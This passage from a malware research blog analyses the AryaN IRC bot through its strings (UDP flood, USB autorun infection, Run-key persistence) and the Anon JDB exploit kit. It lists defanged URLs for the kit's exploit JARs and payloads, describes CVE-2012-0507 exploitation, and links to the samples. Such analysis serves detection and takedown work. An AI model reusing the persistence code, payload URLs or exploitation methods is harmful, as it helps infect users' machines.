strValue = """C:\Users\Admin\AppData\Roaming\pbYRmjBa3B\L4b1HYCWGL.exe"""
objRegistry.SetStringValue &H80000001,strKeyPath,strValueName,strValue
Since I didn't have more clue, ↑this is my base to start searching and asking more for references. A while ago I received a very good advise in kernel mode to strip .NET - onfuscator trails in the binary. (thank's to @Rinn of kernelmode). Previous words are actually the .NET obfuscator:
0x0050D3   Classic Rock    0x005631   National Folk     0x00537F   Instrumental Pop     0x00587D   Samba
0x0050ED Country 0x00564D Swing 0x0053A1 Instrumental Rock 0x005889 Folklore
0x0050FD Dance 0x005659 Bebob 0x0053C5 Ethnic 0x00589B Ballad
So all we do is remove it & assemble the binary then re-checking the insides one more time to find the below malicious operation clues: UDP Flooding/DoS attack operation (Saw Hulk's face is getting greener here...)
0x001600   Flooding: "%s:%d", Delay: "%d(ms)", For "%d" Seconds
0x0015E8 %d%d%d%d%d%d%d%d
0x001590 %s %s %s
0x001574 %s %s :[AryaN]: %s
0x00156C %s %s
0x001558 %s "" "%s" :%s
0x0015A4 Finished Flooding "%s:%d"
0x0015C4 Terminated UDP Flood Thread
Bot Killer feature... (I don't have a heart to se Hulk's face at this point..)
0x000768   Botkiller
0x000774 Successfully Killed And Removed Malicious File: "%s"
0x000800 Usage: %s IP PORT DELAY LENGTH
0x000828 Failed To Start Thread: "%d"
0x00084C Failed: Mis Parameter
Found the below URL:
0x000C84   h00p://api.wipmania.com/
Accesssing removable drives + infecting with autorun.inf w/autostart: (you really don't want to know what's Hulk did at this point..)
0x0017A4   LNK Infected Removable Device: "%s\", Created: "%d" Lnk Files
0x0019B4 AutoRun Infected Removable Device: "%s\"
:
0x0014BC Software\Microsoft\Windows\CurrentVersion\Run
0x001640 %temp%\deletethis.exe
0x001674 Removable_Drive.exe
0x0016BC %s\{%s-%s}
0x0016D8 /k "%s" Open %s
0x001700 %windir%\System32\cmd.exe
0x001740 %s\Removable_Drive.exe
0x001778 %s\%s
0x001788 %s\%s.lnk
0x001990 %s\autorun.inf
Self-update feature...
0x000A18   Update Complete, Uninstalling
0x000A3C Successfully Executed Process: "%s"
0x000A68 Failed To Create Process: "%s", Reason: "%d"
0x000AA0 Successfully Replaced AryaN File With Newly Download File, Update Will Take Affect On Next Reboot
0x000B48 Successfully Downloaded File To: "%s"
0x000B78 Downloading File: "%s"
0x000B94 Download
:
0x000874 Failed: "%d"
0x000884 Visit
0x00088C Failed: Mis Parameter, Usage: %s [SHOW/HIDE] [URL]
0x0008D4 Filed To Visit: "%s"
0x0008F0 Successfully Visited: "%s"
0x000920 %s #%s
0x00092C %s %s
0x000940 Terminated WGet Thread
0x000964 Running From: "%s"
0x00097C [%s][%s] - "%s"
0x000990 hh':'mm':'ss
0x0009E8 {%s}: %s
And some more, which lead us to the reliable references below: Threat Expert Uploaded Ref 7 November 2011, 15:16:47-->>[HERE]SonicWall Security Center ALERT 1 -->>[HERE]SonicWall Security Center ALERT 2 -->>[HERE]

Research Material

Here's the 1.5MB download for the dump (snapped double data on it)-->>[HERE]Be free to download the sample -->>[HERE] - if you are willing to examine it yourself. The download of PCAP I stripped from Matt's effort is-->>[HERE]The full text of the stripped .NET obfuscator binary in text -->>[HERE]That's it for today, the JAR used by this Exploit Kit is written in - the next post here --->>[HERE]
#MalwareMustDie!

Peeking at Anon JDB Exploit Kit JAR infectors (212,7,192,100/jdb/lib/java/lives/xxx) - Story continues, many more Payloads came up!

$
0
0
This is the continuation of the previous post of peeling up Anon JDB Exploit Kit.
You can read the previous post writtent in here -->>[HERE]

We learned a lot from this EK's landing page infection scheme in previous post,
but we couldn't fetch the JAR well, we missed the exploitation scheme of this EK,
I won't give up, after digging & praying, bumping to nonsense here and there,
we were contacted by the fellow VirusTotal researcher @cyberup,
with the very good advice about Anon JDB EK's Jar, I shared below:
That AnonJDB is first of all very vulnerable to sql,
so with permission from the owner its easy to get their DB and files
to see whats what.
↑Indeed a crusader prayers' were answered, a light from God,
with gratitude I hurried following the tips and re-wacked the
exploit servers and getting these JAR with ...a bunch of NEW PAYLOADS!

Kindly allow me to explain the exploit and the payload details as
per below:

The relation between Anon JDB Exploit Kit's JAR and Payload


First of all, JDB exploit Kit is using infection ID in MD5 hashed,
If we got the right hash then we will know the jar and the payload.
By understanding this and using the advice above we figured the path
of the JAR and how it links to payload like following example:
Say, the hash is "xxxx1234"
Then the jar will be at [INFECTOR-DOMAIN]/jdb/lib/java/lives/xxxx1234
with the payload URL of [INFECTOR-DOMAIN]/jdb/lib/load.php?id=xxxx1234

In our case, the JAR files download URL is as per follows:
h00p://212,7,192,100/jdb/lib/java/lives/000316fe5ab4f8c78ff2ea65fd2d9656.jar
h00p://212,7,192,100/jdb/lib/java/lives/00810c54efd040c1491d1ef9c53736a8.jar
h00p://212,7,192,100/jdb/lib/java/lives/35b1ae64e88f3cab77c8beb9b00b6764.jar
h00p://212,7,192,100/jdb/lib/java/lives/39fcb841479cb7e82f645399116c48f2.jar
h00p://212,7,192,100/jdb/lib/java/lives/47a37dc86aab9c56f0d03f1ea22fa352.jar
h00p://212,7,192,100/jdb/lib/java/lives/689cfedf4da4270a472b7e6ee0eab835.jar
h00p://212,7,192,100/jdb/lib/java/lives/8992af86e38418612bd4c09aac40e180.jar
h00p://212,7,192,100/jdb/lib/java/lives/a9d1c1325864c7679519247fb1c2757d.jar
h00p://212,7,192,100/jdb/lib/java/lives/c9f667dfe828de36d7c10491d408838b.jar
h00p://212,7,192,100/jdb/lib/java/lives/d9f9133fb120cd6096870bc2b496805b.jar
h00p://212,7,192,100/jdb/lib/java/lives/e686d160e88d62ca8f8d4f2780f0b64d.jar
h00p://212,7,192,100/jdb/lib/java/lives/ef00ab8fca7d43c1ade8c391dd5e845d.jar

While the related payload is as per follows:
h00p://212,7,192,100/jdb/lib/load.php?id=000316fe5ab4f8c78ff2ea65fd2d9656
h00p://212,7,192,100/jdb/lib/load.php?id=00810c54efd040c1491d1ef9c53736a8
h00p://212,7,192,100/jdb/lib/load.php?id=35b1ae64e88f3cab77c8beb9b00b6764
(No Data)
h00p://212,7,192,100/jdb/lib/load.php?id=47a37dc86aab9c56f0d03f1ea22fa352
h00p://212,7,192,100/jdb/lib/load.php?id=689cfedf4da4270a472b7e6ee0eab835
h00p://212,7,192,100/jdb/lib/load.php?id=8992af86e38418612bd4c09aac40e180
h00p://212,7,192,100/jdb/lib/load.php?id=a9d1c1325864c7679519247fb1c2757d
h00p://212,7,192,100/jdb/lib/load.php?id=c9f667dfe828de36d7c10491d408838b
h00p://212,7,192,100/jdb/lib/load.php?id=d9f9133fb120cd6096870bc2b496805b
h00p://212,7,192,100/jdb/lib/load.php?id=e686d160e88d62ca8f8d4f2780f0b64d
(No Data)
*)No Data = The JAR wasn't contained the payload downloadable URL.

the JAR files


So we have fetched the JAR with the below snip response logs:
   : 
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2013 06:37:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 27 Jan 2013 11:58:55 GMT
ETag: "cf0522-f99-e2835dc0"
Accept-Ranges: bytes
Content-Length: 3993
Connection: close
Content-Type: application/x-java-archive
200 OK
Length: 3993 (3.9K) [application/x-java-archive]
Saving to: `00810c54efd040c1491d1ef9c53736a8.jar'
2013-02-02 15:36:52 (57.0 MB/s) - `00810c54efd040c1491d1ef9c53736a8.jar' saved [3993/3993]
Nothing "fancy" in fetching them and, yes, we got them all : This is what will happen if you access the JAR directly from the firefox:

Exploit & infection method used in the JARs

I will explain it step by step, this is going to be a bit long, so pls bear with these details.
The JARs and the list of CVE exploitation used + Payload names: ---------------------------------------------------------------- 000316fe5ab4f8c78ff2ea65fd2d9656.jar CVE-2012-0507 (java.exe) 00810c54efd040c1491d1ef9c53736a8.jar CVE-2012-0507 (Flash.exe) 35b1ae64e88f3cab77c8beb9b00b6764.jar CVE-2012-0507 (hwid.exe) 39fcb841479cb7e82f645399116c48f2.jar XXXXX (XXXXX) 47a37dc86aab9c56f0d03f1ea22fa352.jar CVE-2012-0507 (XXX 0byte/sexecam.exe ) 689cfedf4da4270a472b7e6ee0eab835.jar CVE-2012-0507 (javaupdate.exe) 8992af86e38418612bd4c09aac40e180.jar CVE-2012-0507 (file.exe /a downloader script) a9d1c1325864c7679519247fb1c2757d.jar CVE-2012-0507 (AdobeFlash.exe) c9f667dfe828de36d7c10491d408838b.jar CVE-2012-0507 (host.exe /a downloader script) d9f9133fb120cd6096870bc2b496805b.jar CVE-2012-0507 (sdsf.exe) e686d160e88d62ca8f8d4f2780f0b64d.jar CVE-2012-0507 (eafaeeef.exe) ef00ab8fca7d43c1ade8c391dd5e845d.jar XXXXX (XXXXX)

PoC of CVE-2012-0507 used:

The summary is: by using the BufferedOutputStream flooded with writing arrays of Bytes the JAR is exploiting the Java Runtime Environment to gain privilege to execute the download and calling the LocalRunTime.Exec() to run the malware. The BufferedOutputStream/CVE-2012-0507 traces: Exploit Methods:

PoC of Infection traces:

The download URL, path to save the payload & payload's execution calls + URL reference: You'll be linked also to a malware related URL upon success exploitation (in the sample below is http:// or undefined) like the sample below: ↑See the purpple mark of the reference URL.

PoC of all the JAR + Download URL + Payload snapshot

All of the JAR detected in this AnonJDB EK Servers are using the same exploit & infection method as per below. I detected 7(seven) PE payload malware, 2(two) - payloads of HTML w/JavaScript of OTHER malware downloader, with 2 inactive JARS + 1 unavailable payloads. Including the previous post's sample the Total are 13(thirteen) scheme of infection within one IP of 212,7,192,100 Below is the snapshot of the infector code used one by one: 000316fe5ab4f8c78ff2ea65fd2d9656.jar 00810c54efd040c1491d1ef9c53736a8.jar 35b1ae64e88f3cab77c8beb9b00b6764.jar 39fcb841479cb7e82f645399116c48f2.jar ((received 0byte file download)) 689cfedf4da4270a472b7e6ee0eab835.jar 8992af86e38418612bd4c09aac40e180.jar a9d1c1325864c7679519247fb1c2757d.jar c9f667dfe828de36d7c10491d408838b.jar d9f9133fb120cd6096870bc2b496805b.jar e686d160e88d62ca8f8d4f2780f0b64d.jar

Conclusion:

1. With this post herewith we conclude the research of Anon JDB Exploit Kit. 2. So many scheme of infection of fake updater/fake site that can be used by this Exploit Kit 3. The usage of sql database is making AnonJDB can provide many infection scheme 4. We need to shutdown 212,7,192,100 infector right away, this post can be used as evidence.

Samples

For the research purpose & raising the detection ratio of these malwares, I hereby sharing the samples (JARs + payloads) here -->>[HERE] Payloads MD5 details:
2013/02/02 16:40 842,955 AdobeFlash.exe 5ae6434a9c00f57db6b8d80a0e07d551 2013/02/02 17:07 257,536 eafaeeef.exe 434cb440d3960e3dc5dc5e5762cf641f 2013/02/02 16:28 17,534 file.exe 510e954ee7fd8542ba38a12e73aa8dad 2013/02/02 15:41 363,008 Flash.exe fd1f42ec224f16d4586d3e807aea65d3 2013/02/02 16:51 67,805 host.exe c2706e1ee737fc9e5f5a05f3def5af93 2013/02/02 16:02 10,240 hwid.exe 44fef11ca8263ec8ff2879d492d8fb4c 2013/02/02 15:40 503,296 java.exe 521f94e1bf48d808cd02550c9dbcf976 2013/02/02 16:18 429,048 javaupdate.exe 440a5a869cb42ca95dc39524f7627217 2013/02/02 17:00 1,798,085 sdsf.exe 92f03b79b265b6cb10e11c19a3462bbb
Virus Total (with some new payloads with poor) Detection Ratio:
AdobeFlash.exe (17/46) -->>[VT-Result]eafaeeef.exe (42/46) -->>[VT-Result]file.exe (0/46) -->>[VT-Result]Flash.exe (13/46) -->>[VT-Result]host.exe (0/46) -->>[VT-Result]hwid.exe (4/46) -->>[VT-Result]java.exe (7/46) -->>[VT-Result]javaupdate.exe (5/44) -->>[VT-Result]sdsf.exe (5/46) -->>[VT-Result]
#MalwareMustDie!
Viewing all 149 articles
Browse latest View live




Latest Images